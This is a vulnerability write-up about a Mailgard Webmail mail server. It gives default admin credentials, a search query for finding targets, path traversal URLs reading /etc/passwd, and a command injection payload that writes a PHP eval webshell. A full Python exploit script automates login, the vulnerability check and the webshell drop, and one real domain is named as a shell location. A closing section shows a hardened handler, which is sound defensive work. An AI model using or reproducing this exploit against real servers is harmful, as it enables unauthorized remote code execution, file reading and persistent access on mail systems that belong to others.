Youyou (Mailgard Webmail) mail server getshell 0day, with Python exploit
1. Arbitrary file download (login required)
A Baidu search for intitle:"mailgard webmail" turns up many installations that have never changed the admin password; the default is admin/hicomadmin.
http://mail.xxx.com.cn/src/read_file.php?signature=../etc/passwd
http://mail.xxx.com.cn/src/read_file.php?uploadimage=../etc/passwd
Using this vulnerability, read the lighttpd error.log to learn the web root: /var/www/newmail/
2. getshell via system() command execution
Download the source files for code auditing; a command execution vulnerability is found.
Starting at line 3 of /var/www/newmail/src/ajaxserver.php:
if ($_GET['exec'] == 'recall') { // recall the email
    $user = str_replace('\\', '\\\\', $_POST['user']);
    $messageid = str_replace('\\', '\\\\', $_POST['messageid']);
    system(HM_SHELL . "Mail_recall.sh '" . $user . "' '" . $messageid . "' '" . $onlineip . "' > null &");
    unset($_SESSION['h_MAILS']['sent']);
    echo 'OK';
    exit;
}
The programmer directly defeats the protection of magic_quotes_gpc and addslashes by doubling the backslashes (the system itself has global filtering; the code was copied from Discuz), so the single quote around the argument can be closed and a command injected, resulting in getshell:
The webshell is obtained as follows (here http://mail.sihc.com.cn/shell.php, password 123):
http://mail.xxx.com.cn/src/ajaxserver.php?exec=recall
POST: user=1'|echo '<?php eval($_POST[123]); ?>'>/var/www/newmail/shell.php #&messageid=1
The automated exploit is as follows:
Usage: python fuck.py http://mail.test.com:80/ account password
import requests
import sys

if len(sys.argv) < 4:
    print 'usage:python fuck.py http(s)://target:port/ <username> <password>'
    print 'example:python fuck.py http://mail.test.com:80/ admin admin'
    sys.exit(0)
else:
    target = sys.argv[1]
    if not target.endswith('/'):
        target += '/'
    username = sys.argv[2]
    password = sys.argv[3]

sessionid = ''

def login(target,username,password):
    login_request = ''
    global sessionid
    domain = target[(target.index('.')+1):(target.index(':',6))]
    print 'domain=' + domain
    login_url = target + 'index.php'
    post_data = 'txtname=' + username + '&domain=' + domain + '&txtpwd=' + password + '&languages=zh-cn&button=%E7%99%BB+%E5%BD%95'
    try:
        login_request = requests.post(login_url,post_data,allow_redirects=False,verify=False,timeout=3)
        if login_request.status_code == 302:
            print 'login succeeded'
            sessionid = login_request.cookies['PHPSESSID']
            return sessionid
        else:
            print 'login failed,please check username and password'
            return False
    except Exception,e:
        print Exception,":",e
        return False

def check(target,sessionid):
    check_request = ''
    url = target + 'src/read_file.php?uploadimage=../../../../../../../../../../etc/passwd'
    request_header = {'cookie': 'MAILSESSID=' + str(sessionid) + '; PHPSESSID=' + str(sessionid)}
    try:
        check_request = requests.get(url,headers=request_header,verify=False,timeout=3)
        if 'root:x:0:0:root:/root:/bin/bash' in check_request.text and check_request.status_code == 200:
            print 'target is vulnerable\r\n'
            # print 'the content of file \'/etc/passwd\'\r\n'
            # print check_request.text
            return True
        else:
            print 'target is not vulnerable'
            return False
    except Exception,e:
        print Exception,":",e
        return False

def getshell(target,sessionid):
    getshell_request = ''
    fuckurl = target + 'src/ajaxserver.php?exec=recall'
    getshell_header = {'cookie': 'MAILSESSID=' + str(sessionid) + '; PHPSESSID=' + str(sessionid)}
    getshell_data = 'user=1\'|echo \'<?php eval($_POST[123]); ?>\'>/var/www/newmail/shell123.php #&messageid=1'
    # print getshell_data
    try:
        getshell_request = requests.post(fuckurl,getshell_data,headers=getshell_header,allow_redirects=False,verify=False)
        if (requests.get(target + 'shell123.php',verify=False).status_code == 200):
            print 'getshell succeeded,address:' + str(target + 'shell123.php') + ' password:123'
        else:
            print 'getshell failed!'
    except Exception,e:
        print Exception,":",e
        return False

if __name__ == '__main__':
    if (login(target,username,password)):
        print 'sessionid=' + sessionid
        if (check(target,sessionid)):
            print 'target is vulnerable to directory transversal'
        else:
            print 'target is not vulnerable to directory transversal'
        print 'trying to getshell,please wait'
        getshell(target,sessionid)
Solution:
Filter
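As an added example (my own code, not the vendor's), this is the recall handler from ajaxserver.php rewritten so the "Filter" advice is actually applied: the backslash-doubling str_replace() is dropped and every value handed to system() goes through escapeshellarg(). HM_SHELL, Mail_recall.sh and $onlineip are the names from the page; the character whitelist on the user name and message id is an assumption about what those identifiers look like.

```php
<?php
// Hardened form of the vulnerable recall handler (added example, not vendor code).
// The original doubled backslashes in $user/$messageid, which undid the
// addslashes()/magic_quotes_gpc escaping and let a single quote close the
// '...' argument passed to system(). escapeshellarg() wraps the value in
// single quotes and escapes any embedded quotes, so user input can never end
// the argument or start a new shell command.
if (isset($_GET['exec']) && $_GET['exec'] === 'recall') {
    $user      = isset($_POST['user']) ? (string) $_POST['user'] : '';
    $messageid = isset($_POST['messageid']) ? (string) $_POST['messageid'] : '';

    // Undo legacy magic_quotes escaping so escapeshellarg() sees the raw value
    // (get_magic_quotes_gpc() no longer exists on PHP 8, hence the guard).
    if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
        $user      = stripslashes($user);
        $messageid = stripslashes($messageid);
    }

    // Defence in depth: a mailbox name and a message id never need shell
    // metacharacters. The allowed character set here is an assumption;
    // adjust it to the product's real identifier format.
    if (!preg_match('/^[A-Za-z0-9._@-]{1,128}$/', $user) ||
        !preg_match('/^[A-Za-z0-9._-]{1,128}$/', $messageid)) {
        header('HTTP/1.1 400 Bad Request');
        echo 'ERR';
        exit;
    }

    // Every argument is quoted by escapeshellarg(); output goes to /dev/null
    // instead of a stray file called "null" in the web directory.
    $cmd = HM_SHELL . 'Mail_recall.sh '
         . escapeshellarg($user) . ' '
         . escapeshellarg($messageid) . ' '
         . escapeshellarg($onlineip)
         . ' > /dev/null 2>&1 &';
    system($cmd);
    unset($_SESSION['h_MAILS']['sent']);
    echo 'OK';
    exit;
}
```

With this in place the payload shown above (user=1'|echo ... #) is passed to Mail_recall.sh as one literal string and is rejected by the whitelist before the shell is even invoked.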